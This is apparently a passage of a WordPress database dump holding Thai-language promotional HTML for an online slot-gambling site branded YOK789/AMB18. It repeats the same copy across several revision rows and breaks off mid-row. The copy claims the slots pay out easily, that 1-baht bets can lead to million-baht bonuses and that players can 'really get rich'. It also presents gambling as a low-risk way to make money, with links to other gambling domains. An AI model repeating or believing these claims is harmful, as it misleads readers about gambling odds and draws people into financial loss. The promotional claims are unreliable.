ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p><ul><li><h3><b>YOK789 </b><b>แจกโปรโมชันจัดเต็ม </b></h3></li></ul><p><b>ถ้าพูดถึงความคุ้มที่จับต้องได้ เว็บเราคือสายเปย์ตัวจริง โปรโมชันมาแบบจัดหนักจัดเต็มไม่มีกั๊ก ทั้งโบนัสสมาชิกใหม่ โปรฝากรายวัน และกิจกรรมลุ้นรางวัลที่สลับหมุนเวียนให้ร่วมสนุกตลอด ทำให้ทุกการเติมเงินมีพลังมากกว่าปกติ ความพีคอยู่ที่เงื่อนไขเข้าใจง่าย ไม่ซับซ้อน รับสิทธิ์ไวไม่ต้องรอนาน แค่กดรับก็พร้อมลุยต่อได้ทันที บรรยากาศในเว็บเลยเต็มไปด้วยความตื่นเต้นเหมือนมีบูสต์เพิ่มทุกครั้งที่หมุน เกมสล็อตแต่ละรอบมีความหวังมากขึ้นเพราะมีโปรช่วยดัน ใครชอบฟีลเล่นแล้วได้กำไรเพิ่มแบบเนียน ๆ ที่นี่ตอบโจทย์แบบสุดทาง ทำให้การปั่นทุกครั้งไม่ใช่แค่สนุกแต่ยังรู้สึกว่าคุ้มค่าแบบเห็นชัดทุกยอด</b></p><ul><li><h3><b>ใช้ทุนน้อยก็เล่นได้ </b></h3></li></ul><p><b>สายงบน้อยไม่ต้องถอยเปิดโหมดให้เริ่มต้นง่ายด้วยเบทสบายกระเป๋า แค่มีทุนหลักสิบก็เข้ามาสัมผัสความมันได้ทันที ไม่ต้องรอเงินก้อนใหญ่ก็มีสิทธิ์ลุ้นรางวัล ระบบเกมถูกออกแบบให้มือใหม่จับทางได้ไว เล่นเพลินไม่กดดัน ทำให้การบริหารทุนเป็นเรื่องง่าย ใครอยากค่อย ๆ ปั้นกำไรแบบไม่เสี่ยงหนักก็วางแผนได้ตามสไตล์ ความเฟี้ยวคือแม้ใช้ทุนไม่มากก็ยังได้ฟีลเดียวกับสายทุนสูง ทุกการหมุนมีโอกาสแตกจริงแบบไม่แบ่งชนชั้น เป็นพื้นที่ที่ให้ทุกคนเริ่มต้นได้เท่ากัน แล้วค่อยต่อยอดกำไรให้โตขึ้นตามจังหวะของตัวเอง</b></p><ul><li><h3><b>เกมหลากหลาย ค่ายดังครบ </b></h3></li></ul><p>ความสนุกของเว็บคือการรวมเกมหลากหลายแนวไว้ในที่เดียว ทั้งสล็อตธีมแฟนตาซี ผจญภัย วัฒนธรรม และสไตล์คลาสสิกให้เลือกปั่นไม่ซ้ำอารมณ์ ค่ายเกมชั้นนำถูกคัดมาแบบเน้นคุณภาพ ภาพกราฟิกคมชัด เอฟเฟกต์จัดเต็ม เล่นแล้วลื่นไหลไม่มีสะดุด ทำให้ทุกครั้งที่เข้าเว็บเหมือนได้เปิดโลกใหม่ของความบันเทิง จะสายชอบโบนัสกระจายหรือสายลุ้นแจ็กพอตก็มีตัวเลือกตอบโจทย์ครบ ความดีงามคือมีการอัปเดตเกมใหม่เข้ามาเรื่อย ๆ ไม่ปล่อยให้ความสนุกดรอป ใครเบื่ออะไรเดิม ๆ ก็สลับแนวได้ทันที เป็นคลังเกมที่ทำให้การปั่นแต่ละวันไม่น่าเบื่อและเต็มไปด้วยสีสันตลอดเวลา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ <strong>ปัน โปร สล็อต</strong> รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <strong>ปั่น สล็อต ฟรี ทดลอง</strong> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-02-26 19:09:51','2026-02-26 19:09:51','',44,'https://amb18slot.com/?p=376',0,'revision','',0),(377,3,'2026-02-26 19:09:51','2026-02-26 19:09:51','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p><ul><li><h3><b>YOK789 </b><b>แจกโปรโมชันจัดเต็ม </b></h3></li></ul><p><b>ถ้าพูดถึงความคุ้มที่จับต้องได้ เว็บเราคือสายเปย์ตัวจริง โปรโมชันมาแบบจัดหนักจัดเต็มไม่มีกั๊ก ทั้งโบนัสสมาชิกใหม่ โปรฝากรายวัน และกิจกรรมลุ้นรางวัลที่สลับหมุนเวียนให้ร่วมสนุกตลอด ทำให้ทุกการเติมเงินมีพลังมากกว่าปกติ ความพีคอยู่ที่เงื่อนไขเข้าใจง่าย ไม่ซับซ้อน รับสิทธิ์ไวไม่ต้องรอนาน แค่กดรับก็พร้อมลุยต่อได้ทันที บรรยากาศในเว็บเลยเต็มไปด้วยความตื่นเต้นเหมือนมีบูสต์เพิ่มทุกครั้งที่หมุน เกมสล็อตแต่ละรอบมีความหวังมากขึ้นเพราะมีโปรช่วยดัน ใครชอบฟีลเล่นแล้วได้กำไรเพิ่มแบบเนียน ๆ ที่นี่ตอบโจทย์แบบสุดทาง ทำให้การปั่นทุกครั้งไม่ใช่แค่สนุกแต่ยังรู้สึกว่าคุ้มค่าแบบเห็นชัดทุกยอด</b></p><ul><li><h3><b>ใช้ทุนน้อยก็เล่นได้ </b></h3></li></ul><p><b>สายงบน้อยไม่ต้องถอยเปิดโหมดให้เริ่มต้นง่ายด้วยเบทสบายกระเป๋า แค่มีทุนหลักสิบก็เข้ามาสัมผัสความมันได้ทันที ไม่ต้องรอเงินก้อนใหญ่ก็มีสิทธิ์ลุ้นรางวัล ระบบเกมถูกออกแบบให้มือใหม่จับทางได้ไว เล่นเพลินไม่กดดัน ทำให้การบริหารทุนเป็นเรื่องง่าย ใครอยากค่อย ๆ ปั้นกำไรแบบไม่เสี่ยงหนักก็วางแผนได้ตามสไตล์ ความเฟี้ยวคือแม้ใช้ทุนไม่มากก็ยังได้ฟีลเดียวกับสายทุนสูง ทุกการหมุนมีโอกาสแตกจริงแบบไม่แบ่งชนชั้น เป็นพื้นที่ที่ให้ทุกคนเริ่มต้นได้เท่ากัน แล้วค่อยต่อยอดกำไรให้โตขึ้นตามจังหวะของตัวเอง</b></p><ul><li><h3><b>เกมหลากหลาย ค่ายดังครบ </b></h3></li></ul><p>ความสนุกของเว็บคือการรวมเกมหลากหลายแนวไว้ในที่เดียว ทั้งสล็อตธีมแฟนตาซี ผจญภัย วัฒนธรรม และสไตล์คลาสสิกให้เลือกปั่นไม่ซ้ำอารมณ์ ค่ายเกมชั้นนำถูกคัดมาแบบเน้นคุณภาพ ภาพกราฟิกคมชัด เอฟเฟกต์จัดเต็ม เล่นแล้วลื่นไหลไม่มีสะดุด ทำให้ทุกครั้งที่เข้าเว็บเหมือนได้เปิดโลกใหม่ของความบันเทิง จะสายชอบโบนัสกระจายหรือสายลุ้นแจ็กพอตก็มีตัวเลือกตอบโจทย์ครบ ความดีงามคือมีการอัปเดตเกมใหม่เข้ามาเรื่อย ๆ ไม่ปล่อยให้ความสนุกดรอป ใครเบื่ออะไรเดิม ๆ ก็สลับแนวได้ทันที เป็นคลังเกมที่ทำให้การปั่นแต่ละวันไม่น่าเบื่อและเต็มไปด้วยสีสันตลอดเวลา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ <strong>ปัน โปร สล็อต</strong> รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <strong>ปั่น สล็อต ฟรี ทดลอง</strong> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-02-26 19:09:51','2026-02-26 19:09:51','',44,'https://amb18slot.com/?p=377',0,'revision','',0),(378,3,'2026-02-26 19:09:51','2026-02-26 19:09:51','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, 